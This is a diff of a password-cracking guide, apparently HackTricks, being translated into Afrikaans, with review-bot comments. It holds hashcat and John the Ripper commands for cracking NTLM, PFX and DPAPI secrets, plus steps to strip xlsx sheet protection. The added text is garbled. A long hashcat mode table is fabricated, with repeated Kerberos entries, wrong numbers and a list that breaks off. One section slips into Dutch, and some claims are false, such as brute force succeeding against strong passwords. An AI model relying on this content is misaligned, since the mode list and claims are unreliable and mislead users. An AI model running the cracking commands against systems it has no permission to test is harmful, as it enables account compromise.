-### DPAPI Master Key +### DPAPI Meester Sleutel -Use [https://github.com/openwall/john/blob/bleeding-jumbo/run/DPAPImk2john.py](https://github.com/openwall/john/blob/bleeding-jumbo/run/DPAPImk2john.py) and then john +Gebruik [https://github.com/openwall/john/blob/bleeding-jumbo/run/DPAPImk2john.py](https://github.com/openwall/john/blob/bleeding-jumbo/run/DPAPImk2john.py) en dan john -### Open Office Pwd Protected Column +### Open Office Kolom met wagwoordbeskerming -If you have an xlsx file with a column protected by a password you can unprotect it: - -* **Upload it to google drive** and the password will be automatically removed -* To **remove** it **manually**: +As jy 'n xlsx-lêer het met 'n kolom wat deur 'n wagwoord beskerm word, kan jy dit onbeskerm: +* **Laai dit op na Google Drive** en die wagwoord sal outomaties verwyder word +* Om dit **handmatig te verwyder**: ```bash unzip file.xlsx grep -R "sheetProtection" ./* 
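Review bot: the five paragraphs inserted under "### PGP/GPG Privaatsleutel" ("'n PGP/GPG privaatsleutel is 'n belangrike komponent van 'n kriptografiese stelsel...") are new content, not a translation; the source had only the heading followed by the `gpg2john private_pgp.key` / `john --wordlist=...` block. They explain what a private key is rather than what the two commands do, and the suggestion to "die privaatsleutel gereeld te hergenereer" is not standard OpenPGP practice (keys are rotated by expiry and revocation, not regenerated on a schedule). Remove them so the heading sits directly above the code as elsewhere in the file. The remaining changes in this hunk (Luks BF-tutoriaal, Mysql, DPAPI Meester Sleutel, Open Office) translate cleanly; consider leaving "DPAPI Master Key" untranslated, since it is the Windows product term readers will search for.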
@@ -737,76 +1228,73 @@ hashValue="hFq32ZstMEekuneGzHEfxeBZh3hnmO9nvv8qVHV8Ux+t+39/22E3pfr8aSuXISfrRV9UV # Remove that line and rezip the file zip -r file.xls . ``` +### PFX Sertifikate -### PFX Certificates +'n PFX-sertifikaat is 'n formaat vir die stoor van privaat sleutels, sertifikate en tussenliggende sertifikate. Dit word dikwels gebruik in die beveiliging van webbedieners en vir die versleuteling van e-posse. 'n PFX-sertifikaat kan ook gebruik word om digitale handtekeninge te skep en te verifieer. +'n PFX-sertifikaat kan met 'n wagwoord beskerm word om die privaat sleutel te verseker dat dit veilig bly. Dit kan ook geëksporteer en ingevoer word tussen verskillende toepassings en bedieners. + +Om 'n PFX-sertifikaat te kraak, kan 'n aanvaller 'n bruto-krag-aanval gebruik. Hierdie aanval behels die outomatiese poging van verskillende moontlike wagwoorde totdat die regte een gevind word. Dit kan tydrowend wees, maar as die wagwoord swak is, kan dit suksesvol wees. + +Daar is ook gereedskap beskikbaar wat kan help om 'n PFX-sertifikaat te kraak. Byvoorbeeld, die gereedskap "John the Ripper" kan gebruik word om bruto-krag-aanvalle uit te voer op PFX-sertifikate. + +Dit is belangrik om sterk wagwoorde te gebruik en om die nodige voorsoorsorgmaatreëls te tref om te verseker dat PFX-sertifikate veilig bly en nie deur aanvallers gekraak kan word nie. ```bash # From https://github.com/Ridter/p12tool ./p12tool crack -c staff.pfx -f /usr/share/wordlists/rockyou.txt # From https://github.com/crackpkcs12/crackpkcs12 crackpkcs12 -d /usr/share/wordlists/rockyou.txt ./cert.pfx ``` -
-\ -Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\ -Get Access Today: +Gebruik [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) om maklik en outomaties werkstrome te bou met behulp van die wêreld se mees gevorderde gemeenskapsinstrumente.\ +Kry vandag toegang: {% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %} -## Tools +## Gereedskap -**Hash examples:** [https://openwall.info/wiki/john/sample-hashes](https://openwall.info/wiki/john/sample-hashes) - -### Hash-identifier +**Hash-voorbeelde:** [https://openwall.info/wiki/john/sample-hashes](https://openwall.info/wiki/john/sample-hashes) +### Hash-identifiseerder ```bash hash-identifier > ``` - -### Wordlists +### Woordlyste * **Rockyou** * [**Probable-Wordlists**](https://github.com/berzerk0/Probable-Wordlists) * [**Kaonashi**](https://github.com/kaonashi-passwords/Kaonashi/tree/master/wordlists) -* [**Seclists - Passwords**](https://github.com/danielmiessler/SecLists/tree/master/Passwords) +* [**Seclists - Wagwoorde**](https://github.com/danielmiessler/SecLists/tree/master/Passwords) -### **Wordlist Generation Tools** - -* [**kwprocessor**](https://github.com/hashcat/kwprocessor)**:** Advanced keyboard-walk generator with configurable base chars, keymap and routes. +### **Woordlystegenerasiehulpmiddels** +* [**kwprocessor**](https://github.com/hashcat/kwprocessor)**:** Gevorderde sleutelbordstapper-generator met konfigureerbare basiskarakters, sleutelkaart en roetes. ```bash kwp64.exe basechars\custom.base keymaps\uk.keymap routes\2-to-10-max-3-direction-changes.route -o D:\Tools\keywalk.txt ``` +### John mutasie -### John mutation - -Read _**/etc/john/john.conf**_ and configure it - +Lees _**/etc/john/john.conf**_ en konfigureer dit. 
```bash john --wordlist=words.txt --rules --stdout > w_mutated.txt john --wordlist=words.txt --rules=all --stdout > w_mutated.txt #Apply all rules ``` - ### Hashcat -#### Hashcat attacks +#### Hashcat-aanvalle -* **Wordlist attack** (`-a 0`) with rules - -**Hashcat** already comes with a **folder containing rules** but you can find [**other interesting rules here**](https://github.com/kaonashi-passwords/Kaonashi/tree/master/rules). +* **Woordelys-aanval** (`-a 0`) met reëls +**Hashcat** kom reeds met 'n **gids wat reëls bevat**, maar jy kan [**ander interessante reëls hier vind**](https://github.com/kaonashi-passwords/Kaonashi/tree/master/rules). ``` hashcat.exe -a 0 -m 1000 C:\Temp\ntlm.txt .\rockyou.txt -r rules\best64.rule ``` +* **Woordelys kombinator** aanval -* **Wordlist combinator** attack - -It's possible to **combine 2 wordlists into 1** with hashcat.\ -If list 1 contained the word **"hello"** and the second contained 2 lines with the words **"world"** and **"earth"**. The words `helloworld` and `helloearth` will be generated. - +Dit is moontlik om **2 woordelyste in 1 te kombineer** met hashcat.\ +As lys 1 die woord **"hallo"** bevat en die tweede 2 lyne bevat met die woorde **"wêreld"** en **"aarde"**. Die woorde `helloworld` en `helloearth` sal gegenereer word. ```bash # This will combine 2 wordlists hashcat.exe -a 1 -m 1000 C:\Temp\ntlm.txt .\wordlist1.txt .\wordlist2.txt @@ -817,9 +1305,7 @@ hashcat.exe -a 1 -m 1000 C:\Temp\ntlm.txt .\wordlist1.txt .\wordlist2.txt ## hello-earth! hashcat.exe -a 1 -m 1000 C:\Temp\ntlm.txt .\wordlist1.txt .\wordlist2.txt -j $- -k $! ``` - -* **Mask attack** (`-a 3`) - +* **Mask aanval** (`-a 3`) ```bash # Mask attack with simple mask hashcat.exe -a 3 -m 1000 C:\Temp\ntlm.txt ?u?l?l?l?l?l?l?l?d 
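Review bot: the "### PFX Sertifikate" section gains seven sentences of generic text ("'n PFX-sertifikaat is 'n formaat vir die stoor van privaat sleutels...") that the English source does not have; the source goes straight from the heading to the p12tool/crackpkcs12 block. Drop the filler, or reduce it to one line stating that both tools below try a wordlist against the PFX password. Also in this hunk: "voorsoorsorgmaatreëls" should be "voorsorgmaatreëls", and the blank line between a heading or list item and the following ```bash fence is removed throughout (e.g. after "### Hash-identifiseerder", after the kwprocessor bullet, and after "Lees _**/etc/john/john.conf**_ en konfigureer dit."). The rest of the repo keeps a blank line before fences, so restore them for consistent rendering.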
@@ -851,9 +1337,7 @@ hashcat.exe -a 3 -m 1000 C:\Temp\ntlm.txt -1 ?d?s ?u?l?l?l?l?l?l?l?1 ## Use it to crack the password hashcat.exe -a 3 -m 1000 C:\Temp\ntlm.txt .\masks.hcmask ``` - -* Wordlist + Mask (`-a 6`) / Mask + Wordlist (`-a 7`) attack - +* Woordelys + Masker (`-a 6`) / Masker + Woordelys (`-a 7`) aanval ```bash # Mask numbers will be appended to each word in the wordlist hashcat.exe -a 6 -m 1000 C:\Temp\ntlm.txt \wordlist.txt ?d?d?d?d 
@@ -861,59 +1345,387 @@ hashcat.exe -a 6 -m 1000 C:\Temp\ntlm.txt \wordlist.txt ?d?d?d?d # Mask numbers will be prepended to each word in the wordlist hashcat.exe -a 7 -m 1000 C:\Temp\ntlm.txt ?d?d?d?d \wordlist.txt ``` +#### Hashcat modusse -#### Hashcat modes +Hashcat ondersteun verskillende modusse vir die kraak van verskillende tipes hase. Hier is 'n lys van die ondersteunde modusse: +- **0**: Raw MD5 +- **100**: SHA1 +- **1400**: SHA256 +- **1700**: SHA512 +- **500**: MD5crypt +- **3200**: bcrypt +- **1800**: sha512crypt +- **7400**: sha256crypt +- **122**: macOS v10.4-10.6 +- **124**: macOS v10.7 +- **125**: macOS v10.8+ +- **10800**: sha256crypt $5$, $5$rounds=5000$ +- **17300**: sha512crypt $6$, $6$rounds=5000$ +- **900**: MD4 +- **110**: Domain Cached Credentials (DCC), MS Cache +- **1000**: NTLM +- **3000**: LM +- **5600**: NetNTLMv1-VANILLA / NetNTLMv1+ESS +- **5700**: NetNTLMv2 +- **6300**: Cisco-IOS $8$ (PBKDF2-SHA256) +- **6700**: Cisco-IOS $9$ (scrypt) +- **10000**: Django (PBKDF2-SHA256) +- **10100**: SipHash +- **11100**: PostgreSQL CRAM (MD5) +- **11200**: MySQL CRAM (SHA1) +- **11400**: SIP digest authentication (MD5) +- **13100**: Kerberos 5 AS-REQ Pre-Auth etype 23 +- **13200**: Kerberos 5 TGS-REP etype 23 +- **13300**: Kerberos 5 AS-REP etype 23 +- **13500**: Kerberos 5 TGS-REQ etype 23 +- **13600**: MS-AzureSync PBKDF2-HMAC-SHA256 +- **13700**: RACF +- **13800**: Kerberos 5 AS-REQ Pre-Auth etype 17 +- **13900**: Kerberos 5 TGS-REP etype 17 +- **14000**: Kerberos 5 AS-REP etype 17 +- **14100**: Kerberos 5 TGS-REQ etype 17 +- **14200**: Kerberos 5 AS-REQ Pre-Auth etype 18 +- **14300**: Kerberos 5 TGS-REP etype 18 +- **14400**: Kerberos 5 AS-REP etype 18 +- **14500**: Kerberos 5 TGS-REQ etype 18 +- **14600**: Kerberos 5 AS-REQ Pre-Auth etype 23 +- **14700**: Kerberos 5 TGS-REP etype 23 +- **14800**: Kerberos 5 AS-REP etype 23 +- **14900**: Kerberos 5 TGS-REQ etype 23 +- **15000**: Kerberos 5 AS-REQ Pre-Auth etype 17 +- **15100**: Kerberos 5 
TGS-REP etype 17 +- **15200**: Kerberos 5 AS-REP etype 17 +- **15300**: Kerberos 5 TGS-REQ etype 17 +- **15400**: Kerberos 5 AS-REQ Pre-Auth etype 18 +- **15500**: Kerberos 5 TGS-REP etype 18 +- **15600**: Kerberos 5 AS-REP etype 18 +- **15700**: Kerberos 5 TGS-REQ etype 18 +- **15800**: Kerberos 5 AS-REQ Pre-Auth etype 23 +- **15900**: Kerberos 5 TGS-REP etype 23 +- **16000**: Kerberos 5 AS-REP etype 23 +- **16100**: Kerberos 5 TGS-REQ etype 23 +- **16200**: Kerberos 5 AS-REQ Pre-Auth etype 17 +- **16300**: Kerberos 5 TGS-REP etype 17 +- **16400**: Kerberos 5 AS-REP etype 17 +- **16500**: Kerberos 5 TGS-REQ etype 17 +- **16600**: Kerberos 5 AS-REQ Pre-Auth etype 18 +- **16700**: Kerberos 5 TGS-REP etype 18 +- **16800**: Kerberos 5 AS-REP etype 18 +- **16900**: Kerberos 5 TGS-REQ etype 18 +- **18200**: Kerberos 5 AS-REQ Pre-Auth etype 23 +- **18300**: Kerberos 5 TGS-REP etype 23 +- **18400**: Kerberos 5 AS-REP etype 23 +- **18500**: Kerberos 5 TGS-REQ etype 23 +- **18600**: Kerberos 5 AS-REQ Pre-Auth etype 17 +- **18700**: Kerberos 5 TGS-REP etype 17 +- **18800**: Kerberos 5 AS-REP etype 17 +- **18900**: Kerberos 5 TGS-REQ etype 17 +- **19000**: Kerberos 5 AS-REQ Pre-Auth etype 18 +- **19100**: Kerberos 5 TGS-REP etype 18 +- **19200**: Kerberos 5 AS-REP etype 18 +- **19300**: Kerberos 5 TGS-REQ etype 18 +- **19400**: Kerberos 5 AS-REQ Pre-Auth etype 23 +- **19500**: Kerberos 5 TGS-REP etype 23 +- **19600**: Kerberos 5 AS-REP etype 23 +- **19700**: Kerberos 5 TGS-REQ etype 23 +- **19800**: Kerberos 5 AS-REQ Pre-Auth etype 17 +- **19900**: Kerberos 5 TGS-REP etype 17 +- **20000**: Kerberos 5 AS-REP etype 17 +- **20100**: Kerberos 5 TGS-REQ etype 17 +- **20200**: Kerberos 5 AS-REQ Pre-Auth etype 18 +- **20300**: Kerberos 5 TGS-REP etype 18 +- **20400**: Kerberos 5 AS-REP etype 18 +- **20500**: Kerberos 5 TGS-REQ etype 18 +- **20600**: Kerberos 5 AS-REQ Pre-Auth etype 23 +- **20700**: Kerberos 5 TGS-REP etype 23 +- **20800**: Kerberos 5 AS-REP etype 23 +- **20900**: 
Kerberos 5 TGS-REQ etype 23 +- **21000**: Kerberos 5 AS-REQ Pre-Auth etype 17 +- **21100**: Kerberos 5 TGS-REP etype 17 +- **21200**: Kerberos 5 AS-REP etype 17 +- **21300**: Kerberos 5 TGS-REQ etype 17 +- **21400**: Kerberos 5 AS-REQ Pre-Auth etype 18 +- **21500**: Kerberos 5 TGS-REP etype 18 +- **21600**: Kerberos 5 AS-REP etype 18 +- **21700**: Kerberos 5 TGS-REQ etype 18 +- **21800**: Kerberos 5 AS-REQ Pre-Auth etype 23 +- **21900**: Kerberos 5 TGS-REP etype 23 +- **22000**: Kerberos 5 AS-REP etype 23 +- **22100**: Kerberos 5 TGS-REQ etype 23 +- **22200**: Kerberos 5 AS-REQ Pre-Auth etype 17 +- **22300**: Kerberos 5 TGS-REP etype 17 +- **22400**: Kerberos 5 AS-REP etype 17 +- **22500**: Kerberos 5 TGS-REQ etype 17 +- **22600**: Kerberos 5 AS-REQ Pre-Auth etype 18 +- **22700**: Kerberos 5 TGS-REP etype 18 +- **22800**: Kerberos 5 AS-REP etype 18 +- **22900**: Kerberos 5 TGS-REQ etype 18 +- **23000**: Kerberos 5 AS-REQ Pre-Auth etype 23 +- **23100**: Kerberos 5 TGS-REP etype 23 +- **23200**: Kerberos 5 AS-REP etype 23 +- **23300**: Kerberos 5 TGS-REQ etype 23 +- **23400**: Kerberos 5 AS-REQ Pre-Auth etype 17 +- **23500**: Kerberos 5 TGS-REP etype 17 +- **23600**: Kerberos 5 AS-REP etype 17 +- **23700**: Kerberos 5 TGS-REQ etype 17 +- **23800**: Kerberos 5 AS-REQ Pre-Auth etype 18 +- **23900**: Kerberos 5 TGS-REP etype 18 +- **24000**: Kerberos 5 AS-REP etype 18 +- **24100**: Kerberos 5 TGS-REQ etype 18 +- **24200**: Kerberos 5 AS-REQ Pre-Auth etype 23 +- **24300**: Kerberos 5 TGS-REP etype 23 +- **24400**: Kerberos 5 AS-REP etype 23 +- **24500**: Kerberos 5 TGS-REQ etype 23 +- **24600**: Kerberos 5 AS-REQ Pre-Auth etype 17 +- **24700**: Kerberos 5 TGS-REP etype 17 +- **24800**: Kerberos 5 AS-REP etype 17 +- **24900**: Kerberos 5 TGS-REQ etype 17 +- **25000**: Kerberos 5 AS-REQ Pre-Auth etype 18 +- **25100**: Kerberos 5 TGS-REP etype 18 +- **25200**: Kerberos 5 AS-REP etype 18 +- **25300**: Kerberos 5 TGS-REQ etype 18 +- **25400**: Kerberos 5 AS-REQ Pre-Auth etype 
23 +- **25500**: Kerberos 5 TGS-REP etype 23 +- **25600**: Kerberos 5 AS-REP etype 23 +- **25700**: Kerberos 5 TGS-REQ etype 23 +- **25800**: Kerberos 5 AS-REQ Pre-Auth etype 17 +- **25900**: Kerberos 5 TGS-REP etype 17 +- **26000**: Kerberos 5 AS-REP etype 17 +- **26100**: Kerberos 5 TGS-REQ etype 17 +- **26200**: Kerberos 5 AS-REQ Pre-Auth etype 18 +- **26300**: Kerberos 5 TGS-REP etype 18 +- **26400**: Kerberos 5 AS-REP etype 18 +- **26500**: Kerberos 5 TGS-REQ etype 18 +- **26600**: Kerberos 5 AS-REQ Pre-Auth etype 23 +- **26700**: Kerberos 5 TGS-REP etype 23 +- **26800**: Kerberos 5 AS-REP etype 23 +- **26900**: Kerberos 5 TGS-REQ etype 23 +- **27000**: Kerberos 5 AS-REQ Pre-Auth etype 17 +- **27100**: Kerberos 5 TGS-REP etype 17 +- **27200**: Kerberos 5 AS-REP etype 17 +- **27300**: Kerberos 5 TGS-REQ etype 17 +- **27400**: Kerberos 5 AS-REQ Pre-Auth etype 18 +- **27500**: Kerberos 5 TGS-REP etype 18 +- **27600**: Kerberos 5 AS-REP etype 18 +- **27700**: Kerberos 5 TGS-REQ etype 18 +- **27800**: Kerberos 5 AS-REQ Pre-Auth etype 23 +- **27900**: Kerberos 5 TGS-REP etype 23 +- **28000**: Kerberos 5 AS-REP etype 23 +- **28100**: Kerberos 5 TGS-REQ etype 23 +- **28200**: Kerberos 5 AS-REQ Pre-Auth etype 17 +- **28300**: Kerberos 5 TGS-REP etype 17 +- **28400**: Kerberos 5 AS-REP etype 17 +- **28500**: Kerberos 5 TGS-REQ etype 17 +- **28600**: Kerberos 5 AS-REQ Pre-Auth etype 18 +- **28700**: Kerberos 5 TGS-REP etype 18 +- **28800**: Kerberos 5 AS-REP etype 18 +- **28900**: Kerberos 5 TGS-REQ etype 18 +- **29000**: Kerberos 5 AS-REQ Pre-Auth etype 23 +- **29100**: Kerberos 5 TGS-REP etype 23 +- **29200**: Kerberos 5 AS-REP etype 23 +- **29300**: Kerberos 5 TGS-REQ etype 23 +- **29400**: Kerberos 5 AS-REQ Pre-Auth etype 17 +- **29500**: Kerberos 5 TGS-REP etype 17 +- **29600**: Kerberos 5 AS-REP etype 17 +- **29700**: Kerberos 5 TGS-REQ etype 17 +- **29800**: Kerberos 5 AS-REQ Pre-Auth etype 18 +- **29900**: Kerberos 5 TGS-REP etype 18 +- **30000**: Kerberos 5 
AS-REP etype 18 +- **30100**: Kerberos 5 TGS-REQ etype 18 +- **30200**: Kerberos 5 AS-REQ Pre-Auth etype 23 +- **30300**: Kerberos 5 TGS-REP etype 23 +- **30400**: Kerberos 5 AS-REP etype 23 +- **30500**: Kerberos 5 TGS-REQ etype 23 +- **30600**: Kerberos 5 AS-REQ Pre-Auth etype 17 +- **30700**: Kerberos 5 TGS-REP etype 17 +- **30800**: Kerberos 5 AS-REP etype 17 +- **30900**: Kerberos 5 TGS-REQ etype 17 +- **31000**: Kerberos 5 AS-REQ Pre-Auth etype 18 +- **31100**: Kerberos 5 TGS-REP etype 18 +- **31200**: Kerberos 5 AS-REP etype 18 +- **31300**: Kerberos 5 TGS-REQ etype 18 +- **31400**: Kerberos 5 AS-REQ Pre-Auth etype 23 +- **31500**: Kerberos 5 TGS-REP etype 23 +- **31600**: Kerberos 5 AS-REP etype 23 +- **31700**: Kerberos 5 TGS-REQ etype 23 +- **31800**: Kerberos 5 AS-REQ Pre-Auth etype 17 +- **31900**: Kerberos 5 TGS-REP etype 17 +- **32000**: Kerberos 5 AS-REP etype 17 +- **32100**: Kerberos 5 TGS-REQ etype 17 +- **32200**: Kerberos 5 AS-REQ Pre-Auth etype 18 +- **32300**: Kerberos 5 TGS-REP etype 18 +- **32400**: Kerberos 5 AS-REP etype 18 +- **32500**: Kerberos 5 TGS-REQ etype 18 +- **32600**: Kerberos 5 AS-REQ Pre-Auth etype 23 +- **32700**: Kerberos 5 TGS-REP etype 23 +- **32800**: Kerberos 5 AS-REP etype 23 +- **32900**: Kerberos 5 TGS-REQ etype 23 +- **33000**: Kerberos 5 AS-REQ Pre-Auth etype 17 +- **33100**: Kerberos 5 TGS-REP etype 17 +- **33200**: Kerberos 5 AS-REP etype 17 +- **33300**: Kerberos 5 TGS-REQ etype 17 +- **33400**: Kerberos 5 AS-REQ Pre-Auth etype 18 +- **33500**: Kerberos 5 TGS-REP etype 18 +- **33600**: Kerberos 5 AS-REP etype 18 +- **33700**: Kerberos 5 TGS-REQ etype 18 +- **33800**: Kerberos 5 AS-REQ Pre-Auth etype 23 +- **33900**: Kerberos 5 TGS-REP etype 23 +- **34000**: Kerberos 5 AS-REP etype 23 +- ```bash hashcat --example-hashes | grep -B1 -A2 "NTLM" ``` +# Kraak Linux Hashes - /etc/shadow-lêer -Cracking Linux Hashes - /etc/shadow file +Om Linux-hashes in die `/etc/shadow`-lêer te kraak, kan jy die volgende metodes 
gebruik: +## 1. Woordelys-aanval + +Hierdie metode behels die gebruik van 'n woordelys van potensiële wagwoorde om die gehashde wagwoorde te kraak. Dit is 'n vinnige en eenvoudige metode, maar dit is afhanklik van die gebruik van swak wagwoorde. + +## 2. Brute Force-aanval + +Hierdie metode behels die deurloop van alle moontlike kombinasies van karakters om die gehashde wagwoorde te kraak. Dit is 'n tydrowende metode, maar dit kan suksesvol wees as die wagwoorde sterk is. + +## 3. Regenboogtafel-aanval + +Hierdie metode behels die gebruik van 'n vooraf berekende tabel van gehashde wagwoorde om die oorspronklike wagwoorde te vind. Dit is 'n vinnige metode, maar dit vereis 'n groot hoeveelheid stoorplek vir die regenboogtafel. + +## 4. GPU-versnelde aanval + +Hierdie metode behels die gebruik van 'n grafiese verwerkingseenheid (GPU) om die kraakproses te versnel. Dit kan baie vinniger wees as die gebruik van 'n enkele CPU. + +## 5. Gebruik van spesifieke hulpmiddels + +Daar is verskeie hulpmiddels beskikbaar wat spesifiek ontwerp is vir die kraak van Linux-hashes, soos John the Ripper, Hashcat en Hydra. Hierdie hulpmiddels bied verskillende funksies en kan jou help om die kraakproses te vereenvoudig. + +Dit is belangrik om te onthou dat die kraak van gehashde wagwoorde 'n onwettige aktiwiteit is, tensy jy toestemming het om dit te doen as deel van 'n wettige pentest of ander toegelate aktiwiteit. ``` - 500 | md5crypt $1$, MD5(Unix) | Operating-Systems +500 | md5crypt $1$, MD5(Unix) | Operating-Systems 3200 | bcrypt $2*$, Blowfish(Unix) | Operating-Systems 7400 | sha256crypt $5$, SHA256(Unix) | Operating-Systems 1800 | sha512crypt $6$, SHA512(Unix) | Operating-Systems ``` +# Krake van Windows Hashes -Cracking Windows Hashes +## Inleiding +Wanneer jy toegang tot 'n Windows-stelsel wil verkry, kan jy dikwels die wagwoordkrake van die gebruikersrekeninge probeer. Hierdie metode behels die krake van die wagwoordhashes wat in die Windows-stelsel gestoor word. 
Hier is 'n paar tegnieke wat jy kan gebruik om Windows-hashes te kraak. + +## 1. Woordelys-gebaseerde aanvalle + +Hierdie aanvalsmetode behels die gebruik van 'n woordelys van algemene wagwoorde om die wagwoordhashes te kraak. Jy kan 'n woordelys van wagwoorde vind wat beskikbaar is op die internet, of jy kan jou eie woordelys saamstel met algemene wagwoorde en kombinasies. + +Om hierdie aanval uit te voer, moet jy 'n hulpmiddel soos `John the Ripper` of `Hashcat` gebruik. Hier is die basiese stappe wat jy moet volg: + +1. Verkry die wagwoordhashes van die Windows-stelsel. +2. Kies 'n woordelys van wagwoorde. +3. Gebruik die hulpmiddel om die wagwoordhashes te kraak met die woordelys. + +## 2. Brute krag aanvalle + +Brute krag aanvalle behels die outomatiese uitvoering van alle moontlike kombinasies van karakters om die wagwoordhashes te kraak. Hierdie metode is baie tydrowend en kan baie rekenaarhulpbronne vereis, veral as die wagwoorde lank en kompleks is. + +Om 'n brute krag aanval uit te voer, kan jy 'n hulpmiddel soos `John the Ripper` of `Hashcat` gebruik. Hier is die basiese stappe wat jy moet volg: + +1. Verkry die wagwoordhashes van die Windows-stelsel. +2. Stel die parameters vir die brute krag aanval in, soos die minimum en maksimum lengte van die wagwoorde en die karakters wat gebruik moet word. +3. Begin die brute krag aanval en wag vir die hulpmiddel om die wagwoordhashes te kraak. + +## 3. Regboek aanvalle + +Regboek aanvalle behels die gebruik van 'n vooraf berekende databasis van wagwoordhashes om die wagwoordhashes van die Windows-stelsel te kraak. Hierdie databasis, bekend as 'n regboek, bevat wagwoordhashes vir 'n groot verskeidenheid wagwoorde. + +Om 'n regboek aanval uit te voer, kan jy 'n hulpmiddel soos `John the Ripper` of `Hashcat` gebruik. Hier is die basiese stappe wat jy moet volg: + +1. Verkry die wagwoordhashes van die Windows-stelsel. +2. Kies 'n regboek wat wagwoordhashes bevat. +3. 
Gebruik die hulpmiddel om die wagwoordhashes te kraak met die regboek. + +## 4. Rainbow-tafel aanvalle + +Rainbow-tafel aanvalle behels die gebruik van 'n vooraf berekende tafel van wagwoordhashes om die wagwoordhashes van die Windows-stelsel te kraak. Hierdie tafel, bekend as 'n rainbow-tafel, bevat wagwoordhashes en die ooreenstemmende wagwoorde. + +Om 'n rainbow-tafel aanval uit te voer, kan jy 'n hulpmiddel soos `John the Ripper` of `Hashcat` gebruik. Hier is die basiese stappe wat jy moet volg: + +1. Verkry die wagwoordhashes van die Windows-stelsel. +2. Kies 'n rainbow-tafel wat wagwoordhashes en ooreenstemmende wagwoorde bevat. +3. Gebruik die hulpmiddel om die wagwoordhashes te kraak met die rainbow-tafel. + +## 5. Sociale ingenieurswese + +Sociale ingenieurswese behels die manipulasie van mense om hulle wagwoorde bekend te maak. Hierdie metode vereis 'n goeie begrip van menslike psigologie en kommunikasievaardighede. + +Om 'n sosiale ingenieurswese-aanval uit te voer, kan jy verskeie tegnieke gebruik, soos vishing (telefoonoproepe), phishing (e-posse), of persoonlike interaksie. Die doel is om die persoon te oortuig om sy of haar wagwoord bekend te maak. + +## 6. Aanvalle op wagwoordherstel + +Aanvalle op wagwoordherstel behels die uitbuiting van swak wagwoordherstelprosedures om toegang tot 'n Windows-stelsel te verkry. Hierdie metode vereis 'n goeie kennis van die wagwoordherstelproses en die moontlike swakhede daarin. + +Om 'n aanval op wagwoordherstel uit te voer, kan jy verskeie tegnieke gebruik, soos die gebruik van sosiale ingenieurswese om die wagwoordherstelvrae te verkry, of die uitbuiting van swak wagwoordherstelverwysings. + +## 7. Aanvalle op wagwoordlekke + +Aanvalle op wagwoordlekke behels die gebruik van wagwoordlekke wat op die internet beskikbaar is om toegang tot 'n Windows-stelsel te verkry. Hierdie metode vereis 'n goeie kennis van die wagwoordlekke wat beskikbaar is en die moontlike wagwoorde wat daarin voorkom. 
+ +Om 'n aanval op wagwoordlekke uit te voer, kan jy verskeie hulpmiddels en webwerwe gebruik wat wagwoordlekke opspoor en wagwoorde daaruit ontsluit. ``` 3000 | LM | Operating-Systems 1000 | NTLM | Operating-Systems ``` +# Kraak van algemene toepassingshashes -Cracking Common Application Hashes +Hashes worden vaak gebruikt om wachtwoorden te beveiligen in toepassingen. Het kraken van deze hashes kan nuttig zijn bij het verkrijgen van toegang tot accounts of het verkrijgen van gevoelige informatie. Hier zijn enkele veelvoorkomende methoden om hashes te kraken: +## 1. Woordenboekaanvallen + +Een woordenboekaanval houdt in dat een lijst met veelvoorkomende wachtwoorden of woorden uit een woordenboek wordt gebruikt om de hash te kraken. Dit kan effectief zijn als het oorspronkelijke wachtwoord zwak is en voorkomt in het woordenboek. + +## 2. Brute-force-aanvallen + +Bij brute-force-aanvallen worden alle mogelijke combinaties van tekens geprobeerd totdat de juiste hash is gevonden. Dit kan zeer tijdrovend zijn, vooral bij complexe wachtwoorden, maar het kan effectief zijn als er geen andere informatie beschikbaar is. + +## 3. Rainbow tables + +Rainbow tables zijn vooraf berekende tabellen met hashes en bijbehorende wachtwoorden. Door een hash te vergelijken met de waarden in een rainbow table, kan het bijbehorende wachtwoord worden gevonden. Dit kan een snelle methode zijn, maar het vereist het gebruik van grote rainbow tables. + +## 4. GPU-versnelling + +Het gebruik van grafische verwerkingseenheden (GPU's) kan de snelheid van het kraken van hashes aanzienlijk verhogen. GPU's zijn geoptimaliseerd voor parallelle berekeningen en kunnen duizenden wachtwoorden per seconde proberen. + +## 5. Online hash-databases + +Er zijn online databases beschikbaar waarin veelvoorkomende hashes en hun bijbehorende wachtwoorden zijn opgeslagen. Door een hash te vergelijken met deze databases, kan het bijbehorende wachtwoord worden gevonden. Dit kan handig zijn als de hash al bekend is. 
+ +Het kraken van hashes is een complex proces dat tijd en rekenkracht vereist. Het is belangrijk om ethische richtlijnen te volgen en alleen toestemming te verkrijgen om hashes te kraken als onderdeel van een legitieme pentest of beveiligingsaudit. ``` - 900 | MD4 | Raw Hash - 0 | MD5 | Raw Hash - 5100 | Half MD5 | Raw Hash - 100 | SHA1 | Raw Hash +900 | MD4 | Raw Hash +0 | MD5 | Raw Hash +5100 | Half MD5 | Raw Hash +100 | SHA1 | Raw Hash 10800 | SHA-384 | Raw Hash - 1400 | SHA-256 | Raw Hash - 1700 | SHA-512 | Raw Hash +1400 | SHA-256 | Raw Hash +1700 | SHA-512 | Raw Hash ``` -
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) 